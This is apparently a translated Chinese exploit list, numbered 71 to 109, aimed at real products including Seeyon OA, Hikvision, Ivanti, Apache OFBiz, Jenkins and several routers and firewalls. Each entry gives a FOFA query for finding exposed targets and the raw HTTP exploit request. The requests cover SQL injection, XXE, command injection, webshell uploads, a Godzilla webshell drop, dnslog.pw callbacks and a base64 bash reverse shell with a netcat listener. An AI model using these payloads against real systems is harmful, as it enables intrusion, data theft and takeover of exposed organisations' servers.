User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) handheld campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit packet is as follows; it injects a Godzilla webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php
88. DBAppSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom and broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QAX (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QAX (奇安信) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
 <params>
  <param>
   <value>
    <struct>
     <member>
      <name>test</name>
      <value>
       <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
      </value>
     </member>
    </struct>
   </value>
  </param>
 </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}
105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
